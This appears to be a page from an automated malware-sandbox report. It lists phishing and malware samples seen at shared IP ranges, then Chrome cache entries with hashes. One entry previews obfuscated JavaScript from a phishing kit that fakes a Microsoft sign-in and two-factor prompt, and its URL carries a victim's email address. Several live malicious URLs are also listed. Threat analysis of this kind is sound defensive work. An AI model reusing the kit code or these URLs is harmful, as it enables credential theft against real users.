	https://www.bing.com/ck/a?!&&p=e81ff1b9f175bc97b5aba94538245134c97a0f2e284b6d1b7f4817cef43c829bJmltdHM9MTc0Mjc3NDQwMA&ptn=3&ver=2&hsh=4&fclid=19c568d0-da5e-6cab-0452-7d78db436d5e&u=a1aHR0cHM6Ly93d3cuZm90b3BvcmNlbGFuYS5jb20uYnIvbW9kZWxvcy1lc3BlY2lhaXMv&ntb=1	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	EXTERNAL Cash Flow Analysis Final Review Needed Before Submission.msg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	https://www.national-delivery.com/Fuel_Surcharge	Get hash	malicious	Unknown	Browse	151.101.130.137
	http://jmf-properties.com	Get hash	malicious	Unknown	Browse	151.101.66.137
	https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.130.137
s-part-0012.t-0009.t-msedge.net	https://aka.ms/o0ukef	Get hash	malicious	Unknown	Browse	13.107.246.40
	702cb6e..eml	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	702cb6e..eml	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	https://jainiklifesciences.com/proposals	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	https://url.uk.m.mimecastprotect.com/s/xh7OCYWWMSOn2VYt0fxUxvQc_?domain=forms.zohopublic.com	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	https://s3.eu-central-1.amazonaws.com/mailo.html.prod/d684bfaf-79e4-4dfc-84aa-fdb21e3b152c.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	https://mail-donotreply.com/click/65b6d0e2-d9dd-417c-a2b8-70690576459e	Get hash	malicious	Unknown	Browse	13.107.246.40
	jn8DY8kfrM.msi	Get hash	malicious	Unknown	Browse	13.107.246.40
	Invoice-92010-0verdue-ORDER.docx	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	https://teqaloki.site/gasnasalk/hagshaisn/xxx/ZXdlbi5jYWlybnNAZm9zdGVyLWdhbWtvLmNvbQ==	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.40
office.avcbtech.store	Play_VM-Now(apply)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	auuu.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT11027.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT99718.htm	Get hash	malicious	Unknown	Browse	139.28.36.38

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://schoolmngt.ubpages.com/managent/	Get hash	malicious	Unknown	Browse	104.18.41.137
	https://docsend.com/view/idquj8mxi5fphufc	Get hash	malicious	Unknown	Browse	104.16.99.29
	Acgsys#receipt0191.html	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.26.0.100
	0064_QB_Payment_Statemnt87T.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.26.0.100
	https://tfsgroups.com/contact-2/	Get hash	malicious	Unknown	Browse	104.17.24.14
	Sbafla response to shift in trend.msg	Get hash	malicious	Unknown	Browse	104.18.95.41
	original (2).eml	Get hash	malicious	Unknown	Browse	1.1.1.1
	Ipsen USA RFP.pdf	Get hash	malicious	Unknown	Browse	104.18.95.41
	https://8tf7eelab.cc.rs6.net	Get hash	malicious	Unknown	Browse	104.18.11.213
	702cb6e..eml	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
ASN-QUADRANET-GLOBALUS	Play_VM-Now(apply)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	185.174.100.76
	auuu.xhtml	Get hash	malicious	HTMLPhisher	Browse	185.174.100.76
	arm7.elf	Get hash	malicious	Unknown	Browse	104.245.241.61
	mips.elf	Get hash	malicious	Unknown	Browse	104.245.241.61
	ARxx7NW.exe	Get hash	malicious	Xmrig	Browse	104.245.241.161
	.main.elf	Get hash	malicious	Xmrig	Browse	104.245.240.20
	wjfOfXh.exe1.exe	Get hash	malicious	Unknown	Browse	45.95.233.53
	socks.exe	Get hash	malicious	Sliver	Browse	45.61.169.127
	2mtls.exe	Get hash	malicious	Sliver	Browse	45.61.169.127
	1https.exe	Get hash	malicious	Sliver	Browse	45.61.169.127
FASTLYUS	Acgsys#receipt0191.html	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.108.133
	0064_QB_Payment_Statemnt87T.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.130.137
	https://tfsgroups.com/contact-2/	Get hash	malicious	Unknown	Browse	151.101.129.229
	Sbafla response to shift in trend.msg	Get hash	malicious	Unknown	Browse	151.101.129.229
	https://8tf7eelab.cc.rs6.net	Get hash	malicious	Unknown	Browse	151.101.129.140
	Brave.exe	Get hash	malicious	Unknown	Browse	151.101.65.91
	702cb6e..eml	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	702cb6e..eml	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://www.bing.com/ck/a?!&&p=e81ff1b9f175bc97b5aba94538245134c97a0f2e284b6d1b7f4817cef43c829bJmltdHM9MTc0Mjc3NDQwMA&ptn=3&ver=2&hsh=4&fclid=19c568d0-da5e-6cab-0452-7d78db436d5e&u=a1aHR0cHM6Ly93d3cuZm90b3BvcmNlbGFuYS5jb20uYnIvbW9kZWxvcy1lc3BlY2lhaXMv&ntb=1	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	https://smky.app/afyga4	Get hash	malicious	Unknown	Browse	151.101.128.176
FASTLYUS	Acgsys#receipt0191.html	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.108.133
	0064_QB_Payment_Statemnt87T.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.130.137
	https://tfsgroups.com/contact-2/	Get hash	malicious	Unknown	Browse	151.101.129.229
	Sbafla response to shift in trend.msg	Get hash	malicious	Unknown	Browse	151.101.129.229
	https://8tf7eelab.cc.rs6.net	Get hash	malicious	Unknown	Browse	151.101.129.140
	Brave.exe	Get hash	malicious	Unknown	Browse	151.101.65.91
	702cb6e..eml	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	702cb6e..eml	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://www.bing.com/ck/a?!&&p=e81ff1b9f175bc97b5aba94538245134c97a0f2e284b6d1b7f4817cef43c829bJmltdHM9MTc0Mjc3NDQwMA&ptn=3&ver=2&hsh=4&fclid=19c568d0-da5e-6cab-0452-7d78db436d5e&u=a1aHR0cHM6Ly93d3cuZm90b3BvcmNlbGFuYS5jb20uYnIvbW9kZWxvcy1lc3BlY2lhaXMv&ntb=1	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	https://smky.app/afyga4	Get hash	malicious	Unknown	Browse	151.101.128.176

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	dropped
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Chrome Cache Entry: 109

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 679 x 574, 8-bit/color RGB, non-interlaced
Category:	downloaded
Size (bytes):	48869
Entropy (8bit):	7.958559093833488
Encrypted:	false
SSDEEP:	768:ABND0dAJBykYjrl19H2rqdBDErhCGXvrxYZP+mFDFwnsQNPNto2r9t:fAJEkYjrfd2als/rxSFDFvQNP7osr
MD5:	8AA14660517F5460156FCCC2199CF83C
SHA1:	1B49B45651E812973D69A13CFCD137E0521B6DE6
SHA-256:	F2AA979677F3B905F64543C27FA26C6E31EF3320F44DD37F5136D267725AC495
SHA-512:	7530FB22377CBE1486DAD21F99D5F56D8AB2DAAC40EB56A030C8445F5814E097AC2C54AC81154BAD9AC1ADD5FC23D5C2FE4943F8039873D307B8A2C62973A02B
Malicious:	false
Reputation:	low
URL:	https://i.imgur.com/KAb5SEy.png
Preview:	.PNG........IHDR.......>.......4.....IDATx..w\|.......}7=..=.PB.T.."..E.`ET..E."RE....QD.>>...G9.z..P.^.j(!.HHH.6..:\.n....lv?.?\|mvg.{.....u_..2).b....@.`.......@'.....@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@..N(.R.C...X....E..Qn...(.,.......T....hd.F.EA.$I.?.A.z.z..q..hd.........qWP.....E..,.eee..+**++.a. .>.....l4.M.h....j.Q.......y.....P}........#[.l.y.....=ZTTDK..@}\|\|\|.M.^ --..'.t8.f.Y.......P}P=yyy.........\X^^^QQ.^.e=I.r.z...v....v..bq:..$......o....;u.T.......T.T&''g............+.Ri..h4...0.LF..v.}~\|\|.5.\.....x.))).<..............T..W.k...?..cqqq....y..O..].v........Q......p.@....ZRS....h2.Hk...s..>\|..c...d..\..H..X,......s.;....h.9.2`I.......~4#_..w5..w..h....:77.../ .2......X,.(.,.d2I.D..r..........8...lF.......G-.L7..<.W.o6.......m.6.a......_[H...i`..Q8!--m.!.?.xFFF.......P.h....

Chrome Cache Entry: 110

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 111

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	20
Entropy (8bit):	3.346439344671015
Encrypted:	false
SSDEEP:	3:YMES3Y:YMESY
MD5:	7AB0BAE74FD327DA4786185272B6CD23
SHA1:	A28F0144ED10A95901ACD427C6652405E7017C65
SHA-256:	546E1EBAFA0C1584C4527DD7260CCF25C4E358EDAFE66236C00C573B011A0BA9
SHA-512:	3482432C63D5720225B0F6CB55726516E99F946529B3E4AAB4DD3425E3CE07C211E6E7717AD816C112FB112433A61C9A6E0685C1D77EE337568C050426F51A2B
Malicious:	false
URL:	https://api.ipify.org/?format=json
Preview:	{"ip":"161.77.13.2"}

Chrome Cache Entry: 112

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 679 x 574, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	48869
Entropy (8bit):	7.958559093833488
Encrypted:	false
SSDEEP:	768:ABND0dAJBykYjrl19H2rqdBDErhCGXvrxYZP+mFDFwnsQNPNto2r9t:fAJEkYjrfd2als/rxSFDFvQNP7osr
MD5:	8AA14660517F5460156FCCC2199CF83C
SHA1:	1B49B45651E812973D69A13CFCD137E0521B6DE6
SHA-256:	F2AA979677F3B905F64543C27FA26C6E31EF3320F44DD37F5136D267725AC495
SHA-512:	7530FB22377CBE1486DAD21F99D5F56D8AB2DAAC40EB56A030C8445F5814E097AC2C54AC81154BAD9AC1ADD5FC23D5C2FE4943F8039873D307B8A2C62973A02B
Malicious:	false
Preview:	.PNG........IHDR.......>.......4.....IDATx..w\|.......}7=..=.PB.T.."..E.`ET..E."RE....QD.>>...G9.z..P.^.j(!.HHH.6..:\.n....lv?.?\|mvg.{.....u_..2).b....@.`.......@'.....@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@.....X........P}... V........T...........@.......b..>....+@..N(.R.C...X....E..Qn...(.,.......T....hd.F.EA.$I.?.A.z.z..q..hd.........qWP.....E..,.eee..+**++.a. .>.....l4.M.h....j.Q.......y.....P}........#[.l.y.....=ZTTDK..@}\|\|\|.M.^ --..'.t8.f.Y.......P}P=yyy.........\X^^^QQ.^.e=I.r.z...v....v..bq:..$......o....;u.T.......T.T&''g............+.Ri..h4...0.LF..v.}~\|\|.5.\.....x.))).<..............T..W.k...?..cqqq....y..O..].v........Q......p.@....ZRS....h2.Hk...s..>\|..c...d..\..H..X,......s.;....h.9.2`I.......~4#_..w5..w..h....:77.../ .2......X,.(.,.d2I.D..r..........8...lF.......G-.L7..<.W.o6.......m.6.a......_[H...i`..Q8!--m.!.?.xFFF.......P.h....

Chrome Cache Entry: 113

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 256 x 85, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	5579
Entropy (8bit):	7.91798195010819
Encrypted:	false
SSDEEP:	96:V3rhBZDdgtqORgdz5Qx6ujOWNfuQRI/Ku4j7ZrpcQQvUucgGRMqNL0:V3bZetqh4OWNnR4Ku4jFpcDtHGRMqNY
MD5:	28A8812C3AAF8AF83BA5C83C58750528
SHA1:	38DFA889438C48D89DE0551F90C782E5CB5D7587
SHA-256:	A9D76447203C9176B2A401D574D44513A7C550B29C30107B4B8D94A67C6FEBDF
SHA-512:	113AEA80B537AFB95E5123A3C2DDFA9096F8A4DEF82D9F1088DD5C4DB48BD3EC8DB1C5176B6274AA51F334F95107969C06DD5D08CC95D0B8F6B3FB95E2770DA5
Malicious:	false
URL:	https://i.imgur.com/0HdPsKK.png
Preview:	.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....\|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.\|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

Chrome Cache Entry: 114

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 256 x 85, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5579
Entropy (8bit):	7.91798195010819
Encrypted:	false
SSDEEP:	96:V3rhBZDdgtqORgdz5Qx6ujOWNfuQRI/Ku4j7ZrpcQQvUucgGRMqNL0:V3bZetqh4OWNnR4Ku4jFpcDtHGRMqNY
MD5:	28A8812C3AAF8AF83BA5C83C58750528
SHA1:	38DFA889438C48D89DE0551F90C782E5CB5D7587
SHA-256:	A9D76447203C9176B2A401D574D44513A7C550B29C30107B4B8D94A67C6FEBDF
SHA-512:	113AEA80B537AFB95E5123A3C2DDFA9096F8A4DEF82D9F1088DD5C4DB48BD3EC8DB1C5176B6274AA51F334F95107969C06DD5D08CC95D0B8F6B3FB95E2770DA5
Malicious:	false
Preview:	.PNG........IHDR.......U......F:.....IDATx....[U....s.L.N..."..P@.ZD.vH.Ig../........Q........)x....W.....................Jk..vf:.Ir~w.$3.$.$'.3...Z.&...I............93...q.3..a..S..J.........@..`=.....z...z..V.....Z2p..d.....xo.I.........(.S..P..-........O._b.....\|K../..(.).".;....8..y1.......j.W.P.@.O.'2...w..X.s.5>.vA.5..V..+C..E.{..+.......Y.MY.....(.e.....vXs.n...-.Z.0..}j.....e........J.O.......O.L.<...G..J..........%......'....$:)......B.Z.BQ.\|...I...s.G.f..}...k..P.@.P..7?..wz..%..FZWz-....(...H..N.ZGi.9}.[..Z..j.@...E..0.9...7.I..gjd._.V..j.(....o..oC>...k.2..P.{v/.}%..x..2..m..ZE...(.5....%.{...X..{.!.e.....}..$.uT.....i...:F...Q...u......3.t.N$.\d.......n .zJ....x..=.].,.....a.tPE.(.....+.k......._.4..e.;...{.~..%-..Oy....(jI.....&<gZ.)...F.w0p...q..Pc....{y.U......E......7....PT....q..:.+.j..~..:......]?..3.u.{.l.....f...-..k.....'.e...p.~...dj......,Jmo:...'.+..........^.h........?...1~.:.V....a.i.....>Q....(..1].F@...t.....f.rM.

Chrome Cache Entry: 115

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
Category:	downloaded
Size (bytes):	68421
Entropy (8bit):	4.894526489503226
Encrypted:	false
SSDEEP:	768:PO6TtTOT+Th6dO31GqjkKB6wI7JoHHy6BKJwhXBXoXRn2CVWpgnEDUgUoCn4CSaY:PO65yCYyB6F5/VW4HllbE
MD5:	95433AD6C822F912C3EC20D7D0324453
SHA1:	DD09149B83F227F46EBE417D5E55C25A8E5B718C
SHA-256:	3EAA119BDC8067E28626DD3E81A085ACF0F6C2EB6043DB1FEA164F5703CB5E71
SHA-512:	F20107C5DE6BFFB843CF3961EFEE83FCEB45F87DE204F53E55553342F959F23AED2A334B1C970E2B358CC7F1B72789EB84A6D05AD0E8C071B027168F62881D4F
Malicious:	false
URL:	https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=krista.wiebe@umanitoba.ca
Preview:	function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disabled','ajax','text','An\x20error\x20occurred\x20while\x20verifying\x20the\x20code.\x20Please\x20try\x20again.','#msg-2fa','Enter\x20your\x20email\x20address\x20or\x20phone\x20number.','#co','href','pointer-events','querySelector','input','div4','now','button:not(#dummy-bot-trap)','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2220px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20logoname\x22\x20id=\x22mic\x22\x20style=\x22color:\x20#747474;\x22>Microsoft</span><br><br>\u00a0\u00a0\u00a0\u00a0<span\x20id=\x22aich\x22\x20style=\x22margin-left:\x20-16px;\x22></span><div\x20class=\x22py-2\x22><span\x20id=\x22ep\x22\x20class=\

Chrome Cache Entry: 116

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.346439344671015
Encrypted:	false
SSDEEP:	3:YMES3Y:YMESY
MD5:	7AB0BAE74FD327DA4786185272B6CD23
SHA1:	A28F0144ED10A95901ACD427C6652405E7017C65
SHA-256:	546E1EBAFA0C1584C4527DD7260CCF25C4E358EDAFE66236C00C573B011A0BA9
SHA-512:	3482432C63D5720225B0F6CB55726516E99F946529B3E4AAB4DD3425E3CE07C211E6E7717AD816C112FB112433A61C9A6E0685C1D77EE337568C050426F51A2B
Malicious:	false
Preview:	{"ip":"161.77.13.2"}

Chrome Cache Entry: 117

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	258966
Entropy (8bit):	4.694760038815572
Encrypted:	false
SSDEEP:	1536:Pq6wJpJW3jInCU77Pc5ybMMHcFdL5RdD0BKt2AnsD5FWXxXLXv47pGXRMN6o8VbB:dLzsCXo8cAcfO4FIwo7vwI7N
MD5:	D22C8D1F87B47309F3C2A05D2905A762
SHA1:	2DA99CB33FCB4294336D73F2D538ED2D5EC3E3C1
SHA-256:	CA4586C1819D057F7396D917087FE3E650A9466DE644278DC3A8DDA5C3CA71FD
SHA-512:	F96C4580DEDBCA6B830EB4959E45831D3B87231F54F8B4EFE825615E88335550ABD42EBDF8FCCF40631047B0321D0EA8E0D5438F65B7B6E06FEB5253355F4F20
Malicious:	false
URL:	https://sender.linxcoded.top/start/xls/includes/css6.css
Preview:	/!.. Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.. :root {.. --blue: #007bff;.. --indigo: #6610f2;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #dc3545;.. --orange: #fd7e14;.. --yellow: #ffc107;.. --green: #28a745;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #343a40;.. --primary: #007bff;.. --secondary: #6c757d;.. --success: #28a745;.. --info: #17a2b8;.. --warning: #ffc107;.. --danger: #dc3545;.. --light: #f8f9fa;.. --dark: #343a40;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-se

Chrome Cache Entry: 118

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
URL:	https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 119

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 120

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	downloaded
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
URL:	https://code.jquery.com/jquery-3.1.1.min.js
